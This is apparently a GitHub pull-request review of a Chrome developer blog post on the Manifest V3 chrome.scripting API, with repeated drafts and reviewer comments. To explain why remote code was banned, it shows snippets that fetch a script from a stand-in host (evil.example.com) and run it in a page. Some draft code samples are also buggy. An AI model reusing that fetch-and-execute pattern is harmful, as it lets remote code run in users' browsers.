chrome.scripting blog post (#852)
GoogleChrome/developer.chrome.com: site/en/blog/crx-scripting-api/index.md

---
title: "Introducing the chrome.scripting API"
# description: >
#   Why and how we implemented color vision deficiency simulation in DevTools and the Blink Renderer.
layout: "layouts/blog-post.njk"
authors:
  - dotproto
date: 2021-05-03
hero: 'image/dPDCek3EhZgLQPGtEG3y0fTn4v82/HD1U7BxDVRDcTxNaQJ4C.jpg'
alt: ''
tags:
  - extensions
---

Manifest V3 introduces a number of changes to Chrome's extension platform, a handful of which are

> notable or significant changes. In this post, we'll be exploring the motivations and changes

Reviewer: nit: this implies that many / most of the changes in MV3 are not notable : )

Author: Hm. I think it's easiest to just drop that clause.

capabilities in the future.

## Why create a new API?

With a change like this, one of the first questions that tends to come up is, "why?"

A few different factors lead to the Chrome team deciding to introduce a new namespace for scripting.
First, the Tabs API is a bit of a junk drawer for features. Second, we needed to make breaking
changes to the existing `executeScript` API. Third, we knew that we wanted to expand scripting
capabilities for extensions. Together, these concerns clearly defined a need for a new namespace to
house scripting capabilities.

### The junk drawer

One of the issues that has been bothering the Extensions Team for the past few years is that the
`chrome.tabs` API is overloaded. When this API was first introduced most of the capabilities it
provided were related to the broad concept of a browser tab. Even at that point, though, it was a
bit of a grab bag of features and over the years this collection has only grown.

[Image: a beautiful junk drawer. Caption: Artist's rendition of the Tabs API.]

By the time Manifest V3 was released, the Tabs API had grown to cover basic tab management,

> selection management, window organization, positioning, messaging, zoom control, basic navigation,

Reviewer: ```suggestion
selection management, window organization, messaging, zoom control, basic navigation,
```

(I don't see any position in the tabs API - I think that's just windows)

Author: You're right, my mistake.

scripting, and a few other smaller capabilities. While these are all important, it can be a bit
overwhelming for developers when they're getting started and for the Chrome team as we maintain the
platform and consider requests from the developer community.

> Another complicating factor is that the tabs permission is not well understood. While many other

Reviewer: ```suggestion
Another complicating factor is that the `tabs` permission is not well understood. While many other
```

permissions restrict access to a given API (e.g. [`storage`][storage-api]), this permission is a bit
unusual in that it only grants the extension access to sensitive properties on Tab instances (and by
extension also impacts the Windows API). Understandably, many extension developers mistakenly think
they need this permission in order to access methods on the Tabs API like `chrome.tabs.create` or,
more germanely, `chrome.tabs.executeScript`. Moving functionality out of the Tabs API helps clear
up some of this confusion.

> Manifest version bumps are a rare opportunity for us to address these kinds of abstract concerns. As we scoped out Manifest V3 and considered ways to iterate on the platform, we felt this transition was a great time to move scripting functionality to a new API and to narrow the scope of the existing Tabs API.

Reviewer: Wrap at 80 chars

Author: Fixed locally.

### Breaking changes

When designing Manifest V3, one of the major issues that we wanted to address was abuse and malware
enabled by "remotely hosted code." It's common for abusive extension authors to execute scripts
fetched from remote servers to steal user data, inject malware, and evade detection. While good
actors also use this capability, we ultimately felt that it was simply too dangerous to remain as it
was.

There are a couple different ways that extensions can execute unbundled code, but the relevant one
here is the Manifest V2 `chrome.tabs.executeScript` method. This method allows an extension to
execute an arbitrary string of code in a target tab. This, in turn, means that a malicious developer
can fetch an arbitrary script from a remote server and execute it inside any page the extension can
access. We knew that if we wanted to address the remote code problem that we would have to drop this
feature.

```js
let result = await fetch('https://example.com/evil.js');
let script = await result.text();
chrome.tabs.executeScript({
  code: script,
});
```

> We also wanted to clean up some other, more subtle footguns with the Manifest V2 version's design,

Author: Ack.

> like as the `matchAboutBlank` property on the options object.

Reviewer: ```suggestion
like the `matchAboutBlank` property on the options object.
```

Author: Adding locally

While we could have changed the signature of this method within the Tabs API, we felt that between

> these breaking changes and the introduction of new capabilities (covered in the next section) a

Reviewer: ```suggestion
these breaking changes and the introduction of new capabilities (covered in the next section), a
```

Author: Ack

clean break would be easier for everyone.

### Expanding scripting capabilities

Another consideration that fed into the Manifest V3 design process was a desire to introduce
additional scripting capabilities to Chrome's extension platform. Specifically, we wanted to add
support for declarative content scripts and to expand the capabilities of the `executeScript`
method.

> Declarative content scripts support has been an outstanding Chromium feature request for several
> years. Today, Manifest V2 and V3 Chrome extensions can only statically declare content scripts in

Reviewer: ```suggestion
Declarative content scripts support has been a long-standing feature request in Chromium.
Today, Manifest V2 and V3 Chrome extensions can only statically declare content scripts in
```

Author: Ack

their manifest.json file; the platform doesn't provide a way to register new content scripts, tweak
content script registration, or unregister content scripts at runtime.

While we knew that we wanted to tackle this feature request in Manifest V3, none of our existing
APIs felt like the right home. We also considered aligning with Firefox on their [Content Scripts
API][content-scripts], but very early on we identified a couple major drawbacks to this approach.

> First, we knew that we would have incompatible signatures (e.g. dropping`code` support). Second, our

Reviewer: ```suggestion
First, we knew that we would have incompatible signatures (e.g. dropping support for the `code` property). Second, our
```

Author: Ack.

API had a different set of design constraints (e.g. needing a registration to persist beyond a
service worker's lifetime). Finally, this namespace would also pigeonhole us to content script
functionality where we're thinking about scripting in extensions more broadly.

> On the executeScript front, we also wanted to expand what this API could do beyond what the Tabs API version supported. More specifically, we wanted to support functions and arguments, more easily target specific frames, and target non-"tab" contexts.

Reviewer: Wrap

Author: Ack

> On the executeScript front, we also wanted to expand what this API could do beyond what the Tabs API version supported. More specifically, we wanted to support functions and arguments, more easily target specific frames, and target non-"tab" contexts.

Reviewer: ```suggestion
On the `executeScript` front, we also wanted to expand what this API could do beyond what the Tabs API version supported. More specifically, we wanted to support functions and arguments, more easily target specific frames, and target non-"tab" contexts.
```

Author: Ack

## Changes in Manifest V3

In the previous section I mentioned that we're planning to add dynamic content script support. While
I'd love to dig more into what this might look like or how it might work, design goals, or
capabilities, unfortunately we're not quite ready to share those details.

> In the remainder of this post, I'd like to take a closer look at the similarities and differences between `chrome.tabs.executeScript` and `chrome.scripting.executeScript`.

Reviewer: Wrap

Author: This line was replaced by a fuller explanation.

> In the previous section I mentioned that we're planning to add dynamic content script support. While
> I'd love to dig more into what this might look like or how it might work, design goals, or
> capabilities, unfortunately we're not quite ready to share those details.
> 
> In the remainder of this post, I'd like to take a closer look at the similarities and differences between `chrome.tabs.executeScript` and `chrome.scripting.executeScript`.

Reviewer: ```suggestion
In the previous section I mentioned that we're planning to add dynamic content script support. While
I'd love to dig more into more of the details here, the API is still under development.  We'll cover it in
more detail soon.  In the remainder of this post, I'd like to take a closer look at the similarities and differences between `chrome.tabs.executeScript` and `chrome.scripting.executeScript`.
```

Or something similar, perhaps?

Author: As I recall, when we spoke last week we agreed it was best to drop the ideas covered in 119-120 and to simply focus on `executeScript`. That must have slipped my mind or accidentally gotten reverted as I moved the draft into this markdown file. Unless you object, I'll simply remove mention of dynamic content scripts in the next commit.

While considering how the platform would need to evolve in light of remotely hosted code
restrictions, we wanted to find a balance between the raw power of arbitrary code execution and only
allowing static content scripts. The solution we struck on was to allow extensions to inject a
function as a content script and to pass an array of values as arguments.

Let's take a quick look at an (oversimplified) example. Say we wanted to inject a script that
greeted the user by name when the user clicks the extension's action button (icon in the toolbar).
In Manifest V2, we could dynamically construct a code string and execute that script in the current
page.

```js
// Manifest V2 extension

> let givenName = "Default";

Reviewer: ```suggestion
let givenName = 'Default';
```

Author: Ack.

chrome.browserAction.onClicked.addListener((tab) => {
  chrome.tabs.executeScript({

>     code: `alert(\`Hello, ${givenName}\`)`

Reviewer: ```suggestion
    code: `alert('Hello, ${givenName}')`
```

Author: Revised this code block with a slightly different approach. The new sample fetches and evals a JS file, then extracts a property from the return value.

  });
});
```

While Manifest V3 extensions can't use code that isn't bundled with the extension, our goal was to
preserve some of the dynamism that arbitrary code blocks enabled for Manifest V2 extensions. The
function and arguments approach makes it possible for Chrome Web Store reviewers, users, and other
interested parties to more accurately assess the risks an extension poses while also allowing
developers to modify an extension's runtime behavior based on user settings or application state.

```js
// Manifest V3 extension

> let givenName = "Default";

Reviewer: ```suggestion
let givenName = 'Default';
```

Author: Ack.

function greetUser(name) {
  alert(`Hello, ${name}`);
}
chrome.action.onClicked.addListener((tab) => {
  chrome.tabs.executeScript({
    target: { tabId: tab.id },
    func: greetUser,
    args: [givenName],
  });
});
```

> We also wanted to make frames more of a first-class citizen of the API. The Manifest V2 version of

Reviewer: ```suggestion
We also wanted to make support for frames more robust and easier to use. The Manifest V2 version of
```

Author: I used a slightly different construction. "We also wanted to improve how developers interact with frames in the revised API."

`executeScript` allowed developers to target either all frames in a tab or a specific frame in the

> tab. In Manifest V3, we replaced the optional `frame` string property in the options object with an
> optional `frames` array of strings.

Reviewer: ```suggestion
tab. In Manifest V3, we replaced the optional `frame` integer property in the options object with an
optional `frames` array of integers; this allows targeting multiple frames in a single API call.
```

```js
// Manifest V2 extension
chrome.action.onClicked.addListener((tab) => {

>   chrome.scripting.executeScript({

Reviewer: This MV2 extension is using scripting.executeScript() and action, but should be using tabs.executeScript and browserAction.  (This will also entail updating the arguments passed in the executeScript() call)

Author: Fixed.

>     target: { tabId: tab.id, frame: targetFrame1 },
>     files: ["content-script.js"],

Reviewer: ```suggestion
    target: {tabId: tab.id, frame: targetFrame1},
    files: ['content-script.js'],
```

Style nits:
- use 'singleQuotes' in JS
- Be consistent about spacing between [brackets] and {objects}.  According to google style, no spaces after either (but yes between properties and after colons)

Same for the below code snippets

Author: Thanks. I forgot about Google's style guide and used a community formatting tool ([Prettier](https://prettier.io/)) to normalize styles. I'll switch over to using [ESLint](https://eslint.org/) with [eslint-config-google](https://github.com/google/eslint-config-google). I'm going to hold off on merging this suggestion until I get my tooling sorted.

Author: I didn't get my tooling sorted, but I've adopted the tweaks you suggested.

  });
  chrome.scripting.executeScript({
    target: { tabId: tab.id, frame: targetFrame2 },
    files: ["content-script.js"],
  });
});
```

```js
// Manifest V3 extension
chrome.action.onClicked.addListener((tab) => {
  chrome.scripting.executeScript({
    target: { tabId: tab.id, frames: [targetFrame1, targetFrame2] },
    files: ["content-script.js"],
  });
});
```

We've also improved the way we return script injection results in Manifest V3. In Manifest V2,
`executeScript` would return an array of results. Unfortunately, this implementation didn't provide

> enough information about which frame a given result applied to,  which meant that if an error occurred when injecting into `allFrames: true` it was very difficult to track down which frame had the error.

Reviewer: Wrap

Author: Fixed locally.

In Manifest V3, we've added more details to the result objects returned in order to clearly
identify the tab and frame that the injection occurred. This makes it much easier for developers to
identify and react to situations where injection fails unexpectedly.

Moving forward, we're also considering how extensions can interact with installed PWAs and other
contexts that don't conceptually map to "tabs."

> 

Reviewer: I think we need some kind of an outro here - right now, it's a very abrupt ending

Author: Currently drafting it locally. Next commit will flesh this out.

---
title: "Introducing chrome.scripting"
# description: >
#   Why and how we implemented color vision deficiency simulation in DevTools and the Blink Renderer.
layout: "layouts/blog-post.njk"
authors:
  - dotproto
date: 2021-06-07
hero: 'image/dPDCek3EhZgLQPGtEG3y0fTn4v82/HD1U7BxDVRDcTxNaQJ4C.jpg'
alt: ''
tags:
  - extensions
---

Manifest V3 introduces a number of changes to Chrome's extension platform. In this post, we'll be
exploring the motivations and changes introduced by one of the more notable changes: the
introduction of the `chrome.scripting` API.

## What is chrome.scripting?

As the name might suggest, `chrome.scripting` is a new namespace introduced in Manifest V3
responsible for script and style injection capabilities.

Developers that have created Chrome extensions in the past may be familiar with Manifest V2 methods

> on the Tabs API like `chrome.tabs.executeScript` and `chrome.tabs.insertCSS`. These methods allow

Reviewer: Should we link to the tabs API methods?

Author: Definitely. I meant to do this before but it slipped my mind. Thanks for calling this out.

some of this confusion.

### Breaking changes

When designing Manifest V3, one of the major issues that we wanted to address was abuse and malware
enabled by "remotely hosted code." It's common for abusive extension authors to execute scripts
fetched from remote servers to steal user data, inject malware, and evade detection. While good
actors also use this capability, we ultimately felt that it was simply too dangerous to remain as it
was.

There are a couple different ways that extensions can execute unbundled code, but the relevant one
here is the Manifest V2 `chrome.tabs.executeScript` method. This method allows an extension to
execute an arbitrary string of code in a target tab. This, in turn, means that a malicious developer
can fetch an arbitrary script from a remote server and execute it inside any page the extension can
access. We knew that if we wanted to address the remote code problem that we would have to drop this
feature.

```js
let result = await fetch('https://example.com/evil.js');
let script = await result.text();
chrome.tabs.executeScript({
  code: script,
});
```

> We also wanted to clean up some other, more subtle issues with the Manifest V2 version's design,
> like the `matchAboutBlank` property on the options object.

Reviewer: We never revisit this, so, as a reader, I'm left wondering "What was the issue with matchAboutBlank?"

What about something like:

```suggestion
We also wanted to clean up some other, more subtle issues with the Manifest V2 version's design,
and make the API a more polished and predictable tool.
```

Or similar?

clean break would be easier for everyone.

### Expanding scripting capabilities

Another consideration that fed into the Manifest V3 design process was a desire to introduce
additional scripting capabilities to Chrome's extension platform. Specifically, we wanted to add
support for declarative content scripts and to expand the capabilities of the `executeScript`
method.

Declarative content scripts support has been a long-standing feature request in Chromium. Today,
Manifest V2 and V3 Chrome extensions can only statically declare content scripts in their
manifest.json file; the platform doesn't provide a way to register new content scripts, tweak
content script registration, or unregister content scripts at runtime.

While we knew that we wanted to tackle this feature request in Manifest V3, none of our existing
APIs felt like the right home. We also considered aligning with Firefox on their [Content Scripts
API][content-scripts], but very early on we identified a couple major drawbacks to this approach.
First, we knew that we would have incompatible signatures (e.g. dropping support for the `code`

> property) Second, our API had a different set of design constraints (e.g. needing a registration to

Reviewer: ```suggestion
property). Second, our API had a different set of design constraints (e.g. needing a registration to
```

persist beyond a service worker's lifetime). Finally, this namespace would also pigeonhole us to
content script functionality where we're thinking about scripting in extensions more broadly.

On the `executeScript` front, we also wanted to expand what this API could do beyond what the Tabs
API version supported. More specifically, we wanted to support functions and arguments, more easily
target specific frames, and target non-"tab" contexts.

Moving forward, we're also considering how extensions can interact with installed PWAs and other
contexts that don't conceptually map to "tabs."

## Changes between tabs.executeScript and scripting.executeScript

In the remainder of this post, I'd like to take a closer look at the similarities and differences
between `chrome.tabs.executeScript` and `chrome.scripting.executeScript`.

### Injecting a function with arguments

> While considering how the platform would need to evolve in light of remotely hosted code

Reviewer: I usually hyphenate remotely-hosted:

```suggestion
While considering how the platform would need to evolve in light of remotely-hosted code
```

I think that's technically more correct, but don't know off the top of my head if we've established precedence

Author: Ack. I'll normalize on the hyphenated pattern.

page.

```js
// Manifest V2 extension
let userReq = await fetch('https://example.com/greetUser.js');
let userBody = await userReq.text();
let user = eval(userBody);

chrome.browserAction.onClicked.addListener((tab) => {
  chrome.tabs.executeScript({
    // user.greetUser == 'alert("Hello, <GIVEN_NAME>!")'
    code: user.greetUser,
  });
});
```

While Manifest V3 extensions can't use code that isn't bundled with the extension, our goal was to
preserve some of the dynamism that arbitrary code blocks enabled for Manifest V2 extensions. The
function and arguments approach makes it possible for Chrome Web Store reviewers, users, and other
interested parties to more accurately assess the risks an extension poses while also allowing
developers to modify an extension's runtime behavior based on user settings or application state.

```js
// Manifest V3 extension
let userReq = await fetch('https://example.com/user-data.json');
let user = await userReq.json();
let givenName = user.givenName || '<GIVEN_NAME>';

function greetUser(name) {
  alert(`Hello, ${name}!`);
}
chrome.action.onClicked.addListener((tab) => {

>   chrome.tabs.executeScript(tab.id, {

Reviewer: This should use scripting.executeScript and a target

Author: Belgh. I've made too many of these mistakes. I'm going to throw together working MV2 & MV3 extensions to validate the code samples before the final commit.

    func: greetUser,
    args: [givenName],
  });
});
```

### Targeting frames

We also wanted to improve how developers interact with frames in the revised API. The Manifest V2
version of `executeScript` allowed developers to target either all frames in a tab or a specific
frame in the tab.

```js
// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
  chrome.tabs.executeScript(tab.id, {
    frameId: targetFrame1,
    file: 'content-script.js',
  });
  chrome.tabs.executeScript(tab.id, {
    frameId: targetFrame2,
    file: 'content-script.js',
  });
});
```

> In Manifest V3, we replaced the optional `frame` integer property in the options object with an
> optional `frames` array of integers; this allows developers to target multiple frames in a single

Reviewer: ```suggestion
In Manifest V3, we replaced the optional `frameId` integer property in the options object with an
optional `frameIds` array of integers; this allows developers to target multiple frames in a single
```

API call. You can use use `chrome.webNavigation.getAllFrames` to get a list of all frames in a tab.

```js
// Manifest V3 extension
chrome.action.onClicked.addListener((tab) => {
  chrome.scripting.executeScript({
    target: {
      tabId: tab.id,

>       frames: [targetFrame1, targetFrame2],

Reviewer: ```suggestion
      frameIds: [targetFrame1, targetFrame2],
```

Author: Fixed

    },
    files: ['content-script.js'],
  });
});
```

### Script injection results

We've also improved the way we return script injection results in Manifest V3. A "result" is
basically the final statement evaluated in a script. Think of it like the value returned when you
execute a block of code in the Chrome DevTools console.

In Manifest V2, `executeScript` and `insertCSS` would return an array of bare execution results.
This is fine for a single injection point, but if you're injecting into all frames in a tab it can

> be difficult to track down which frame encountered the error.

Reviewer: Or even which frame gave which result, which I think is the more germane example (since we don't [ yet ] return errors from individual frames).  Though I like your approach to it below.  Maybe a combination?  Can we return something "meaningful" from the page, rather than just "success"?  e.g. number of occurrences of a word on a page, etc.

Author: I can definitely tweak the language here to be more generic. I actually learned about this capability while writing this post; the reference to catching errors in the last line here was based on my original, incorrect assumption about how results worked. 

I was intentionally trying to avoid having the script return meaningful data because I didn't want to encourage using this as a general purpose message channel. This was largely based on my own experimentation and being surprised by certain types behaving in was I didn't anticipate (e.g. Error instances converted to null). I'd like to get your thoughts before changing this.

Author: Spoke about this in the morning and iterated on the content in subsequent commits.

For a concrete example, let's take a look at the results returned by a Manifest V2 and Manifest V3.
Both versions of the extension will share the same content script behavior. And for both examples,
we'll be injecting on the same [demo page][iframe-demo].

```js
//// content-script.js
var url = new URL(window.location.href);
if (url.pathname.endsWith('.html')) {
  throw new Error('Incompatible URL path!');
}
'success';
```

When we run the Manifest V2 version, we get back an array of `['success', null]`. Which result
corresponds to the main frame and which is for the iframe? The return value doesn't tell us, so we
don't know for sure.

```js
// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {

>   chrome.scripting.executeScript({

Reviewer: tabs, not scripting

Author: Ack

    allFrames: true,
    file: 'content-script.js';,
  }, (results) => {
    // results == ['success', null]
    for (let result of results) {
      if (result !== 'success') {
        console.log('An error occurred, but where?');
      }
    }
  });
});
```

In the Manifest V3 version, results now contains an array of objects instead of an array of strings,
and the result objects clearly identify the ID of the frame for each result. This makes it much
easier for developers to identify and react to situations where injection fails unexpectedly.

```js
// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {
  let results = await chrome.scripting.executeScript({
    target: {tabId: tab.id, allFrames: true},
    files: ['content-script.js'],
  });
  // results == [{frameId: 0, result: 'success'}, {frameId: 1234, result: null}]
  for (let output of results) {
    if (output.result !== 'success') {
      console.log(`An error occurred in frame ${output.frameId}`);
    }
  }
});
```

## Wrap up

> Manifest version bumps present a rare opportunity to make rethink and modernize extensions APIs. Our

Reviewer: ```suggestion
Manifest version bumps present a rare opportunity to rethink and modernize extensions APIs. Our
```

goal with Manifest V3 is to improve the end user experience by making extensions safer while also
improving the developer experience. By introducing `chrome.scripting` in Manifest V3, we were able
to help clean up the Tabs API, to reimagine `executeScript` for a more secure extensions platform,
and to lay the groundwork for new scripting capabilities that will be coming later this year.

If you have any thoughts or feedback on what we've shared here or Manifest V3 in general, head over

> to the [chromium-extensions](crx-group) Google Group and tell us what you think.

Reviewer: We link this from other places on the site, and I don't think we want to position it as "feedback channel for any thoughts".  I'd just drop this section.

Author: Dropping.

By the time Manifest V3 was released, the Tabs API had grown to cover basic tab management,
selection management, window organization, messaging, zoom control, basic navigation, scripting, and
a few other smaller capabilities. While these are all important, it can be a bit overwhelming for
developers when they're getting started and for the Chrome team as we maintain the platform and
consider requests from the developer community.

Another complicating factor is that the `tabs` permission is not well understood. While many other
permissions restrict access to a given API (e.g. [`storage`][storage-api]), this permission is a bit
unusual in that it only grants the extension access to sensitive properties on Tab instances (and by
extension also impacts the Windows API). Understandably, many extension developers mistakenly think
they need this permission in order to access methods on the Tabs API like `chrome.tabs.create` or,
more germanely, `chrome.tabs.executeScript`. Moving functionality out of the Tabs API helps clear up
some of this confusion.

### Breaking changes

When designing Manifest V3, one of the major issues that we wanted to address was abuse and malware

> enabled by "remotely-hosted code." It's common for abusive extension authors to execute scripts

Reviewer: ```suggestion
enabled by "remotely-hosted code" - code that is executed, but not included in the extension package. It's common for abusive extension authors to execute scripts
```

feature.

```js
(async function() {
  let result = await fetch('https://evil.example.com/malware.js');
  let script = await result.text();

  chrome.tabs.executeScript({
    code: script,
  });
})();
```

We also wanted to clean up some other, more subtle issues with the Manifest V2 version's design,
and make the API a more polished and predictable tool.

While we could have changed the signature of this method within the Tabs API, we felt that between
these breaking changes and the introduction of new capabilities (covered in the next section), a
clean break would be easier for everyone.

### Expanding scripting capabilities

Another consideration that fed into the Manifest V3 design process was a desire to introduce
additional scripting capabilities to Chrome's extension platform. Specifically, we wanted to add
support for declarative content scripts and to expand the capabilities of the `executeScript`
method.

Declarative content scripts support has been a long-standing feature request in Chromium. Today,
Manifest V2 and V3 Chrome extensions can only statically declare content scripts in their

> manifest.json file; the platform doesn't provide a way to register new content scripts, tweak

Reviewer: ```suggestion
`manifest.json` file; the platform doesn't provide a way to register new content scripts, tweak
```

Maybe?  Not sure if we've aligned on that or not.

Author: I'm not sure either, but I'm generally in favor of explicit formatting on file names.

Let's take a quick look at an (oversimplified) example. Say we wanted to inject a script that
greeted the user by name when the user clicks the extension's action button (icon in the toolbar).
In Manifest V2, we could dynamically construct a code string and execute that script in the current
page.

```js
// Manifest V2 extension
chrome.browserAction.onClicked.addListener(async (tab) => {
  let userReq = await fetch('https://example.com/greet-user.js');
  let userScript = await userReq.text();

  chrome.tabs.executeScript({
    // userScript == 'alert("Hello, <GIVEN_NAME>!")'
    code: userScript,
  });
});

```

While Manifest V3 extensions can't use code that isn't bundled with the extension, our goal was to
preserve some of the dynamism that arbitrary code blocks enabled for Manifest V2 extensions. The
function and arguments approach makes it possible for Chrome Web Store reviewers, users, and other
interested parties to more accurately assess the risks an extension poses while also allowing
developers to modify an extension's runtime behavior based on user settings or application state.

```js
// Manifest V3 extension
function greetUser(name) {
  alert(`Hello, ${name}!`);
}

> chrome.action.onClicked.addListener(async(tab) => {

Reviewer: Be consistent in spacing between "async" and  the parens (I'm not sure if we specify by style, so whatever a linter/formatter does is fine, as long as we do the same throughout)

Author: Yeah, we do. I've consistently used a space between async and function/parens elsewhere. Thanks for catching this. Fixing locally.

  let userReq = await fetch('/https://example.com/user-data.json');
  let user = await userReq.json();
  let givenName = user.givenName || '<GIVEN_NAME>';

  chrome.scripting.executeScript({

>     target: { tabId: tab.id },

Reviewer: ```suggestion
    target: {tabId: tab.id},
```

    func: greetUser,
    args: [givenName],
  });
});
```

### Targeting frames

We also wanted to improve how developers interact with frames in the revised API. The Manifest V2
version of `executeScript` allowed developers to target either all frames in a tab or a specific
frame in the tab.

```js
// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
  chrome.webNavigation.getAllFrames({tabId: tab.id}, (frames) => {
    let frame1 = frames[0].frameId;
    let frame2 = frames[1].frameId;

    chrome.tabs.executeScript(tab.id, {
      frameId: frame1,
      file: 'content-script.js',
    });
    chrome.tabs.executeScript(tab.id, {
      frameId: frame2,
      file: 'content-script.js',
    });
  });
});
```

In Manifest V3, we replaced the optional `frameId` integer property in the options object with an
optional `frameIds` array of integers; this allows developers to target multiple frames in a single

> API call. You can use use `chrome.webNavigation.getAllFrames` to get a list of all frames in a tab.

Reviewer: nit: put the part about getAllFrames() above, since we use it in the MV2 example, too

Author: Done

```js
// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {

>   let frames = await new Promise((resolve) => {
>     chrome.webNavigation.getAllFrames({tabId: tab.id}, resolve);
>   });

Reviewer: ```suggestion
  let frames = await chrome.webNavigation.getAllFrames({tabId: tab.id});
```

Per offline conversation

  let frame1 = frame[0].frameId;
  let frame2 = frame[1].frameId;

  chrome.scripting.executeScript({
    target: {
      tabId: tab.id,
      frameIds: [frame1, frame2],
    },
    files: ['content-script.js'],
  });
});
```

### Script injection results

We've also improved the way we return script injection results in Manifest V3. A "result" is
basically the final statement evaluated in a script. Think of it like the value returned when you
call `eval()` or execute a block of code in the Chrome DevTools console, but serialized in order to
pass results across processes.

In Manifest V2, `executeScript` and `insertCSS` would return an array of plain execution results.
This is fine if you only have a single injection point, but result order is not guaranteed when
injecting into multiple frames so there's no way to tell which result is associated with which
frame.

For a concrete example, let's take a look at the `results` arrays returned by a Manifest V2 and a
Manifest V3 version of the same extension. Both versions of the extension will inject the same
content script and we'll be comparing results on the same [demo page][iframe-demo].

```js

> //// content-script.js

Reviewer: ```suggestion
// content-script.js
```

var headers = document.querySelectorAll('h1,h2,h3,h4,h5,h6');
headers.length;
```

When we run the Manifest V2 version, we get back an array of `[0, 1]`. Which result

> corresponds to the main frame and which is for the iframe? The return value doesn't tell us, so we

Reviewer: Technically, first result is, in practice, guaranteed to be the main frame (even though we don't document that).  Can we use a demo with 3 frames?  If not, no big deal, because this is just an implementation detail that developers shouldn't be relying on.

Author: In the back of my head I thought that might be the case. I'm updating the return value example now.

don't know for sure.

```js
// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
  chrome.tabs.executeScript({
    allFrames: true,
    file: 'content-script.js',
  }, (results) => {
    // results == [1, 0]
    for (let result of results) {
      if (result > 0) {

>         // Do something with the frame… which one was it?

Reviewer: ```suggestion
        // Do something with the frame... which one was it?
```

Not sure if it matters, but ellipses in monospace font look odd to me : )

      }
    }
  });
});
```

> In the Manifest V3 version, results now contains an array of objects instead of an array of strings,

Reviewer: ```suggestion
In the Manifest V3 version, `results` now contains an array of result objects instead of an array of just the evaluation results,
```

(results could be non-strings)

Author: Thanks for the clarification.

and the result objects clearly identify the ID of the frame for each result. This makes it much

> easier for developers to identify and react to situations where injection fails unexpectedly.

Reviewer: ```suggestion
easier for developers to utilize the result and take action on a specific frame.
```
